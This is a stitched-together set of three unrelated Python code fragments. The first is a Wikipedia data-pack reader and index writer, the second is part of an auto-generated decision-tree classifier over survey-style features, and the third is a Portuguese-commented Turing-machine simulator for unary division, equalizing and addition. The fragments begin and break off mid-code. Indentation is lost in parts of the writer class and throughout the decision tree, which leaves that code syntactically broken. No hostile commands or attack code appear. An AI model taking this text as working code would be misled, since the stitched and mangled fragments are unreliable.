    Reads an index from the page name to the path of the stored pack.
    Args:
        pack_index_path: The path of this index file. The file should be a tab
          separated file.
    Returns:
        A dictionary that maps from the page name to the full path.
    """
    logging.info("Reading pack index from %s", pack_index_path)
    with open(pack_index_path) as idx:
        return {name: path for name, path in csv.reader(idx, delimiter="\t")}
class WikiPackReader(PackReader):
    """
    This reader reads information from an NIF graph, and finds out the
    corresponding data pack stored on disk. The output from this reader
    are these data packs plus the additional NIF information.
    The function `add_wiki_info` is to be implemented to handle how the
    NIF statements are added to the data pack.
    """
    def __init__(self):
        super().__init__()
        # Maps page name -> relative pack path (loaded from `pack_index`).
        self._pack_index: Dict[str, str] = {}
        # Directory containing the serialized packs.
        self._pack_dir: str = ""
        # Maps a redirect page name -> canonical page name.
        self._redirects: Dict[str, str] = {}
        # Pages already handled in a previous run; these are skipped.
        self._resume_index: Dict[str, str] = {}
    def initialize(self, resources: Resources, configs: Config):
        """Load the pack index, optional resume index, and mandatory redirects."""
        super().initialize(resources, configs)
        # A mapping from the name of the page to the path on the disk.
        self._pack_index = read_index(configs.pack_index)
        self._pack_dir = configs.pack_dir
        if self.configs.resume_index:
            self._resume_index = read_index(configs.resume_index)
            print_progress(
                f"Loaded {len(self._resume_index)} existing " f"files.", "\n"
            )
        if self.resources.contains("redirects"):
            self._redirects = self.resources.get("redirects")
            print_progress(f"{len(self._redirects)} redirects loaded.", "\n")
        else:
            raise ResourceError("Redirects not provided from resources.")
    def add_wiki_info(self, pack: DataPack, statements: List[state_type]):
        # Subclasses decide how the NIF statements are written into the pack.
        raise NotImplementedError
    def _collect(  # type: ignore
        self, nif_path: str
    ) -> Iterator[Tuple[str, List[state_type]]]:
        skipped = 0
        for _, statements in ContextGroupedNIFReader(nif_path):
            # The subject of the first statement names the resource/page.
            name = get_resource_name(statements[0][0])
            if name is not None:
                if name not in self._resume_index:
                    yield name, statements
                else:
                    skipped += 1
                    print_progress(
                        f"Skipped {skipped} documents", terminal_only=True
                    )
    def _parse_pack(
        self, collection: Tuple[str, List[state_type]]
    ) -> Iterator[DataPack]:
        """Locate the stored pack for the resource, enrich it, and yield it."""
        resource_name, statements = collection
        # Resolve redirects to the canonical page name before the index lookup.
        if resource_name in self._redirects:
            resource_name = self._redirects[resource_name]
        if resource_name in self._pack_index:
            print_progress(
                f"Handling resource [{resource_name}] in {self.component_name}"
            )
            pack_path = os.path.join(
                self._pack_dir, self._pack_index[resource_name]
            )
            if os.path.exists(pack_path):
                pack: DataPack = DataPack.deserialize(
                    pack_path,
                    self.configs.serialize_method,
                    self.configs.zip_pack,
                )
                self.add_wiki_info(pack, statements)
                yield pack
            else:
                logging.info("Resource %s pack not found.", resource_name)
    @classmethod
    def default_configs(cls):
        """
        This defines a basic config structure for the reader.
        Here:
          - pack_dir: the directory that contains all the serialized packs.
          - pack_index: the file name under the pack directory that points to
            the index from the name to the actual pack path.
          - resume_index: optional index of already-written packs to skip.
        """
        return {
            "pack_index": "article.idx",
            "pack_dir": ".",
            "resume_index": None,
        }
class WikiArticleWriter(PackWriter):
"""
This is a pack writer that writes out the Wikipedia articles to disk. It
has two special behaviors:
1. If the `input_index_file` file is provided via the configuration and it
exists, the file will be used to determine the path of writing the
data packs. This will also activate the overwrite mode.
2. If the `input_index_file` file is not provided,
2a. The packs are organized into directories. Each directory contains
at most 2000 documents.
2b. the overwrite mode will not be activated
3. If the `output_index_file` is provided, an index file with the provided
name/path will be created, its content will be a mapping from the article
name to the article path.
There are two general use cases:
1. If the writer is used to write a new directory of data, simply provide
the `output_index_file`
2. If the writer is used to add content/overwriting to an existing
directory, it is suggested to use the index file of the original
directory as the `input_index_file`, and the `output_index_file` can be
used to store the information for this new writing process if desired.
"""
_input_index_file: TextIO
_output_index_file: TextIO
# It is difficult to get the type of the csv writer
# https://stackoverflow.com/questions
# /51264355/how-to-type-annotate-object-returned-by-csv-writer
_csv_writer: Any
    def __init__(self):
        super().__init__()
        # Number of articles written so far; drives 2000-per-directory bucketing.
        self.article_count: int = 0
        # True when output paths are taken from an existing input index (see initialize).
        self.__use_existing_index: bool = False
        # Maps article name -> relative sub-path, loaded from the input index.
        self._article_index: Dict[str, str] = {}
    def initialize(self, resources: Resources, configs: Config):
        """Load the optional input index and open the output index file."""
        super().initialize(resources, configs)
        self.article_count = 0
        if self.configs.use_input_index and self.configs.input_index_file:
            # Load input index.
            input_index_path = self.configs.input_index_file
            self._article_index = {}
            if os.path.exists(input_index_path):
                # NOTE(review): this handle is opened but never read here (the
                # `with` block below re-opens the same file); it appears to
                # exist only so `finish` can close it -- confirm and simplify.
                self._input_index_file = open(input_index_path)
                with open(input_index_path) as f:
                    for line in f:
                        article_name, sub_path = line.strip().split()
                        self._article_index[article_name] = sub_path
                self.__use_existing_index = True
                # Existing paths are reused, so overwriting must be allowed.
                self.configs.overwrite = True
                logging.info(
                    "Wikipedia writer is setup with existing index "
                    "file. The output will be written following the input "
                    "index path and overwritten is enabled."
                )
            else:
                raise FileNotFoundError(
                    f"Cannot find provided index file {input_index_path}"
                )
        else:
            self.__use_existing_index = False
        output_index_path = os.path.join(
            self.configs.output_dir, self.configs.output_index_file
        )
        # Append to or truncate the output index depending on configuration.
        self._output_index_file = (
            open(output_index_path, "a")
            if self.configs.append_to_index
            else open(output_index_path, "w")
        )
        self._csv_writer = csv.writer(self._output_index_file, delimiter="\t")
def sub_output_path(self, pack: DataPack) -> Optional[str]:
if self.__use_existing_index:
if pack.pack_name in self._article_index:
# Since datasets are built separated, there might be cases
# where the article referred later is not in the original
# parsed dataset, so we need to check if they exist.
# We could replace the suffix based on writing config.
return (
self._article_index[pack.pack_name].split(".")[0]
+ self._suffix
)
else:
return None
else:
# Organize the data by IO ordering instead.
sub_dir = str(int(self.article_count / 2000)).zfill(5)
pid = pack.get_single(WikiPage).page_id # type: ignore
doc_name = f"doc_{self.article_count}" if pid is None else pid
return os.path.join(sub_dir, doc_name) + self._suffix
def _process(self, input_pack: DataPack):
    """Write the data pack and record its storage location in the index.

    In addition to writing the data pack, we also write an index entry
    mapping the document id to the relative storage path of this
    DataPack. This can be used as a simple index to retrieve the
    relevant file, which can enable faster lookup.

    Args:
        input_pack: The DataPack that contains the Wikipedia information.
    """
    super()._process(input_pack)
    # Write the output index entry. When an existing input index is in
    # use, `initialize` never creates `_csv_writer` (it only exists in
    # the fresh-index branch), so the unconditional write in the
    # original raised AttributeError in that mode — guard against it.
    writer = getattr(self, "_csv_writer", None)
    if writer is not None:
        out_path = self.sub_output_path(input_pack)
        writer.writerow([input_pack.pack_name, out_path])
    self.article_count += 1
    if self.article_count % 1000 == 0:
        logging.info(
            "Written %s to %s", self.article_count, self.configs.output_dir
        )
def finish(self, _: Resources):
    """Close the index file handles opened in `initialize`."""
    if self.configs.use_input_index and self.configs.input_index_file:
        self._input_index_file.close()
    # The original leaked the output index handle: when a fresh index is
    # being written, close it so buffered rows are flushed to disk.
    output_file = getattr(self, "_output_index_file", None)
    if output_file is not None:
        output_file.close()
| |
34, "metric_value": 0.232, "depth": 11}
if obj[5]>1:
# {"feature": "Direction_same", "instances": 18, "metric_value": 0.1049, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[5]<=1:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=3:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=0.0:
# {"feature": "Occupation", "instances": 22, "metric_value": 0.3697, "depth": 9}
if obj[6]>5:
# {"feature": "Gender", "instances": 12, "metric_value": 0.2593, "depth": 10}
if obj[3]<=0:
# {"feature": "Education", "instances": 9, "metric_value": 0.1778, "depth": 11}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Education", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=5:
# {"feature": "Education", "instances": 10, "metric_value": 0.3167, "depth": 10}
if obj[5]<=0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.1667, "depth": 11}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>3.0:
# {"feature": "Time", "instances": 61, "metric_value": 0.4287, "depth": 6}
if obj[1]>0:
# {"feature": "Occupation", "instances": 49, "metric_value": 0.4074, "depth": 7}
if obj[6]<=12:
# {"feature": "Age", "instances": 36, "metric_value": 0.3333, "depth": 8}
if obj[4]>0:
# {"feature": "Education", "instances": 27, "metric_value": 0.4386, "depth": 9}
if obj[5]>0:
# {"feature": "Gender", "instances": 19, "metric_value": 0.4613, "depth": 10}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.4563, "depth": 11}
if obj[9]>1.0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.4628, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[9]<=1.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[9]<=4.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 8, "metric_value": 0.3333, "depth": 10}
if obj[9]>0.0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2778, "depth": 11}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.2778, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=0.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[6]>12:
# {"feature": "Gender", "instances": 13, "metric_value": 0.3916, "depth": 8}
if obj[3]<=0:
# {"feature": "Age", "instances": 11, "metric_value": 0.4606, "depth": 9}
if obj[4]>1:
# {"feature": "Education", "instances": 6, "metric_value": 0.4444, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 6, "metric_value": 0.4444, "depth": 11}
if obj[9]<=1.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=1:
# {"feature": "Education", "instances": 5, "metric_value": 0.48, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[9]<=4.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 12, "metric_value": 0.3333, "depth": 7}
if obj[6]<=12:
# {"feature": "Age", "instances": 8, "metric_value": 0.3333, "depth": 8}
if obj[4]>0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2667, "depth": 9}
if obj[3]<=0:
# {"feature": "Education", "instances": 5, "metric_value": 0.3, "depth": 10}
if obj[5]>2:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.375, "depth": 11}
if obj[9]<=4.0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]<=2:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[6]>12:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[11]>2:
# {"feature": "Age", "instances": 271, "metric_value": 0.4868, "depth": 4}
if obj[4]<=5:
# {"feature": "Passanger", "instances": 232, "metric_value": 0.4871, "depth": 5}
if obj[0]>0:
# {"feature": "Education", "instances": 223, "metric_value": 0.4918, "depth": 6}
if obj[5]>1:
# {"feature": "Occupation", "instances": 138, "metric_value": 0.4876, "depth": 7}
if obj[6]<=16:
# {"feature": "Bar", "instances": 122, "metric_value": 0.4891, "depth": 8}
if obj[7]<=3.0:
# {"feature": "Restaurant20to50", "instances": 118, "metric_value": 0.4822, "depth": 9}
if obj[9]<=2.0:
# {"feature": "Time", "instances": 108, "metric_value": 0.496, "depth": 10}
if obj[1]>0:
# {"feature": "Gender", "instances": 93, "metric_value": 0.4982, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 52, "metric_value": 0.497, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 41, "metric_value": 0.4997, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 15, "metric_value": 0.4571, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4082, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[9]>2.0:
# {"feature": "Time", "instances": 10, "metric_value": 0.1333, "depth": 10}
if obj[1]<=1:
return 'False'
elif obj[1]>1:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[7]>3.0:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 9}
if obj[1]<=1:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[9]>1.0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]<=1.0:
return 'True'
else: return 'True'
elif obj[1]>1:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>16:
# {"feature": "Bar", "instances": 16, "metric_value": 0.4042, "depth": 8}
if obj[7]>0.0:
# {"feature": "Time", "instances": 10, "metric_value": 0.4, "depth": 9}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.3333, "depth": 10}
if obj[9]<=1.0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.25, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[9]>1.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[7]<=0.0:
# {"feature": "Time", "instances": 6, "metric_value": 0.25, "depth": 9}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[9]<=1.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>1.0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=1:
# {"feature": "Occupation", "instances": 85, "metric_value": 0.4649, "depth": 7}
if obj[6]>4:
# {"feature": "Gender", "instances": 59, "metric_value": 0.481, "depth": 8}
if obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 34, "metric_value": 0.4361, "depth": 9}
if obj[9]<=1.0:
# {"feature": "Bar", "instances": 26, "metric_value": 0.4154, "depth": 10}
if obj[7]>0.0:
# {"feature": "Time", "instances": 16, "metric_value": 0.3, "depth": 11}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.32, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[7]<=0.0:
# {"feature": "Time", "instances": 10, "metric_value": 0.4, "depth": 11}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>1.0:
# {"feature": "Time", "instances": 8, "metric_value": 0.2083, "depth": 10}
if obj[1]>0:
# {"feature": "Bar", "instances": 6, "metric_value": 0.2222, "depth": 11}
if obj[7]>0.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[7]<=0.0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[3]>0:
# {"feature": "Time", "instances": 25, "metric_value": 0.419, "depth": 9}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 21, "metric_value": 0.4698, "depth": 10}
if obj[9]>0.0:
# {"feature": "Bar", "instances": 15, "metric_value": 0.44, "depth": 11}
if obj[7]<=1.0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[7]>1.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]<=0.0:
# {"feature": "Bar", "instances": 6, "metric_value": 0.2222, "depth": 11}
if obj[7]<=0.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[7]>0.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=4:
# {"feature": "Time", "instances": 26, "metric_value": 0.3615, "depth": 8}
if obj[1]<=1:
# {"feature": "Bar", "instances": 20, "metric_value": 0.3059, "depth": 9}
if obj[7]<=2.0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.3451, "depth": 10}
if obj[9]<=2.0:
# {"feature": "Gender", "instances": 15, "metric_value": 0.3909, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3967, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[9]>2.0:
return 'True'
else: return 'True'
elif obj[7]>2.0:
return 'True'
else: return 'True'
elif obj[1]>1:
# {"feature": "Bar", "instances": 6, "metric_value": 0.4, "depth": 9}
if obj[7]<=1.0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.3, "depth": 10}
if obj[9]<=2.0:
# {"feature": "Gender", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
elif obj[9]>2.0:
return 'True'
else: return 'True'
elif obj[7]>1.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[0]<=0:
# {"feature": "Gender", "instances": 9, "metric_value": 0.1481, "depth": 6}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Occupation", "instances": 3, "metric_value": 0.0, "depth": 7}
if obj[6]<=5:
return 'True'
elif obj[6]>5:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[4]>5:
# {"feature": "Education", "instances": 39, "metric_value": 0.3199, "depth": 5}
if obj[5]>0:
# {"feature": "Bar", "instances": 29, "metric_value": 0.2188, "depth": 6}
if | |
import os
class TuringMachine:
def __init__(self):
    # No machine state to set up; just echo the instance so the user
    # sees the object was created.
    print(self)
@staticmethod
def getInputData():
    # Prompt (Portuguese: "enter the number") and return the raw input
    # string; callers convert it with int() themselves.
    return input("\n\t\t\t\t\t Digite o Numero : ")
# ***********************************************************************
def divisao(self):
    # ***********************************************************************
    """Simulate a Turing machine computing numero1 // numero2 on a tape.

    The tape `ret` is laid out as:
      '>' start marker, numero1 '*' cells, '_' separator, numero2 '*'
      cells, '_' separator, int(numero1 / numero2) blank cells, one more
      blank, then numero1 % numero2 blank cells.
    Each simulation step prints a '|' head marker line followed by the
    current tape, then applies the transition for the current `estado`
    (states -1..21; 21 is the halt state). '$' is used as a temporary
    mark for already-visited '*' cells.
    NOTE(review): numero2 == 0 raises ZeroDivisionError at the quotient
    pre-computation below — presumably inputs are assumed positive.
    """
    numero1 = int(self.getInputData())
    numero2 = int(self.getInputData())
    # Build the initial tape (see layout in the docstring).
    ret = ['>']
    for item in range(numero1):
        ret.append('*')
    ret.append('_')
    for item in range(numero2):
        ret.append('*')
    ret.append('_')
    for item in range(int(numero1 / numero2)):
        ret.append('_')
    ret.append('_')
    for item in range(numero1 % numero2):
        ret.append('_')
    estado = -1
    pos = 0
    # Run the state machine until the halt state (21) is reached.
    while (estado != 21):
        # Print the head-position marker line, then the tape itself.
        marc = []
        for i in range(pos):
            marc.append(' ')
        marc.append('|')
        auxmarc = ''.join(marc)
        print('{0}'.format(auxmarc))
        aux = ''.join(ret)
        print('{0} \n'.format(aux))
        if (estado == -1):
            # Initial step: move off the '>' marker.
            pos += 1
            estado += 1
        elif (estado == 0):
            if ret[pos] == '*':
                estado = 1
                ret[pos] = '$'
                pos += 1
        elif (estado == 1):
            if (ret[pos] == '*'):
                pos += 1
            else:
                estado = 2
                pos += 1
        elif (estado == 2):
            if (ret[pos] == '*'):
                pos += 1
            else:
                estado = 3
                pos -= 1
        elif (estado == 3):
            if (ret[pos] == '*'):
                estado = 4
                ret[pos] = '$'
                pos -= 1
        elif (estado == 4):
            if (ret[pos] == '*'):
                estado = 5
                pos -= 1
            else:
                estado = 10
                pos += 1
        elif (estado == 5):
            if (ret[pos] == '*'):
                pos -= 1
            elif (ret[pos] == '$'):
                estado = 6
                pos += 1
            else:
                pos -= 1
        elif (estado == 6):
            if (ret[pos] == '*'):
                estado = 7
                ret[pos] = '$'
                pos += 1
            else:
                estado = 12
                pos += 1
        elif (estado == 7):
            if (ret[pos] == '*'):
                pos += 1
            elif (ret[pos] == '$'):
                estado = 3
                pos -= 1
            else:
                estado = 8
                pos += 1
        elif (estado == 8):
            if (ret[pos] == '*'):
                pos += 1
            elif (ret[pos] == '$'):
                estado = 3
                pos -= 1
            else:
                estado = 3
                pos -= 1
        elif (estado == 9):
            if (ret[pos] == '_'):
                estado = 10
                pos += 1
        elif (estado == 10):
            # Restore '$' marks back to '*' while scanning right.
            if (ret[pos] == '$'):
                estado = 10
                ret[pos] = '*'
                pos += 1
            else:
                estado = 11
                pos += 1
        elif (estado == 11):
            if (ret[pos] == '*'):
                pos += 1
            else:
                estado = 5
                ret[pos] = '*'
                pos -= 1
        elif (estado == 12):
            if (ret[pos] == '*'):
                pos += 1
            elif (ret[pos] == '$'):
                estado = 13
                pos += 1
            else:
                estado = 20
                ret[pos] = '>'
                pos -= 1
        elif (estado == 13):
            if (ret[pos] == '$'):
                pos += 1
            else:
                estado = 14
                pos += 1
        elif (estado == 14):
            if (ret[pos] == '*'):
                pos += 1
            else:
                estado = 15
                pos += 1
        elif (estado == 15):
            if (ret[pos] == '*'):
                pos += 1
            else:
                estado = 16
                ret[pos] = '*'
                pos -= 1
        elif (estado == 16):
            if (ret[pos] == '>'):
                estado = 18
                pos -= 1
            elif (ret[pos] == '$'):
                estado = 17
                pos -= 1
            else:
                pos -= 1
        elif (estado == 17):
            if (ret[pos] == '*'):
                estado = 18
                pos += 1
            else:
                pos -= 1
        elif (estado == 18):
            if (ret[pos] == '$'):
                estado = 19
                ret[pos] = '*'
                pos += 1
        elif (estado == 19):
            if (ret[pos] == '$'):
                estado = 13
                pos += 1
            else:
                estado = 20
                ret[pos] = '>'
                pos -= 1
        elif (estado == 20):
            # Sweep left, blanking cells until the '>' marker halts us.
            if (ret[pos] == '>'):
                estado = 21
                ret[pos] = '_'
                pos += 1
            else:
                ret[pos] = '_'
                pos -= 1
    # Print the final head marker and tape after halting.
    marc = []
    for i in range(pos):
        marc.append(' ')
    marc.append('|')
    auxmarc = ''.join(marc)
    print('{0} \n'.format(auxmarc))
    aux = ''.join(ret)
    print('{0} \n'.format(aux))
    # Trim one '_' per cell preceding the '>' marker before printing the
    # final tape content ("Fim do procedimento" = end of procedure).
    p = 0
    for item in range(len(ret)):
        if (ret[item] == '>'):
            break
        p += 1
    for item in range(p):
        ret.remove('_')
    print('Fim do procedimento ')
    print(''.join(ret))
# ***********************************************************************
def igualar(self):
    # ***********************************************************************
    """Simulate a Turing machine that "equalizes" two unary numbers.

    Tape layout: '>' marker, numero1 '*' cells, '_' separator, numero2
    '*' cells, then enough '_' padding that both branches below append
    numero1 - numero2 + 1 blanks in total. States run -1..9 (9 halts);
    '$' temporarily marks visited '*' cells. Every step prints a '|'
    head-marker line followed by the tape.
    """
    numero1 = self.getInputData()
    numero2 = self.getInputData()
    numero1 = int(numero1)
    numero2 = int(numero2)
    # Build the initial tape.
    ret = ['>']
    for item in range(numero1):
        ret.append('*')
    ret.append('_')
    for item in range(numero2):
        ret.append('*')
    if (numero2 != 0):
        for item in range(numero1 - numero2 + 1):
            ret.append('_')
    else:
        # numero2 == 0: numero1 blanks plus one extra gives the same
        # numero1 - numero2 + 1 padding as the branch above.
        for item in range(numero1):
            ret.append('_')
        ret.append('_')
    estado = -1
    pos = 0
    # Run the state machine until the halt state (9) is reached.
    while (estado != 9):
        # Print the head-position marker line, then the tape itself.
        marc = []
        for i in range(pos):
            marc.append(' ')
        marc.append('|')
        auxmarc = ''.join(marc)
        print('{0}'.format(auxmarc))
        aux = ''.join(ret)
        print('{0} \n'.format(aux))
        if (estado == -1):
            # Initial step: move off the '>' marker.
            pos += 1
            estado += 1
        elif (estado == 0):
            if ret[pos] == '*':
                estado = 1
                ret[pos] = '$'
                pos += 1
            else:
                estado = 7
                pos +=1
        elif (estado == 1):
            if (ret[pos] == '*'):
                pos += 1
                estado = 2;
            else:
                estado = 6
                pos += 1
        elif (estado == 2):
            if (ret[pos] == '*'):
                pos += 1
            else:
                estado = 3
                pos += 1
        elif (estado == 3):
            if (ret[pos] == '*'):
                estado = 4
                ret[pos] = '$'
                pos -= 1
            elif(ret[pos] == '$'):
                pos += 1
            else:
                estado = 4
                ret[pos] = '$'
                pos -= 1
        elif (estado == 4):
            if (ret[pos] == '*'):
                estado = 5
                pos -= 1
            else:
                pos -= 1
        elif (estado == 5):
            if (ret[pos] == '$'):
                estado = 0
                pos += 1
            else:
                pos -= 1
        elif (estado == 6):
            if (ret[pos] == '$'):
                pos += 1
            else:
                estado = 7
                ret[pos] = '$'
                pos += 1
        elif (estado == 7):
            if (ret[pos] == '*'):
                pos += 1
            else:
                estado = 8
                pos -= 1
        elif (estado == 8):
            # Final right-to-left sweep: '$' marks become '*', everything
            # else becomes '_', until the '>' marker halts the machine.
            if (ret[pos] == '>'):
                estado = 9
                pos += 1
            elif (ret[pos] == '$'):
                ret[pos] = '*'
                pos -= 1
            else:
                ret[pos] = '_'
                pos -= 1
    # Print the final head marker, the tape, and the result.
    marc = []
    for i in range(pos):
        marc.append(' ')
    marc.append('|')
    auxmarc = ''.join(marc)
    print('{0} \n'.format(auxmarc))
    aux = ''.join(ret)
    print('{0} \n'.format(aux))
    print(''.join(ret))
# ***********************************************************************
def soma(self):
    # ***********************************************************************
    """Simulate a Turing machine adding two unary numbers.

    The tape is the string "<numero1 stars> <numero2 stars>"; the machine
    (states q0 -> q1 -> q2) fills the gap with a '*' and erases the last
    '*', yielding numero1 + numero2 stars. Each transition is printed as
    a row of the "Estado Atual | Leu | ..." trace table.
    """
    numero1 = self.getInputData()
    numero2 = self.getInputData()
    # Build the unary operands.
    operador1 = ""
    operador2 = ""
    i = 0
    for i in range(int(numero1)):
        operador1 += "*"
    i = 0
    for i in range(int(numero2)):
        operador2 += "*"
    res = operador1 + " " + operador2 + ""
    # os.system("cls")
    print("\n\t\t________________________SOMA_______________________")
    print("Valores: " + res)
    res = list(res)
    estado = "q0"
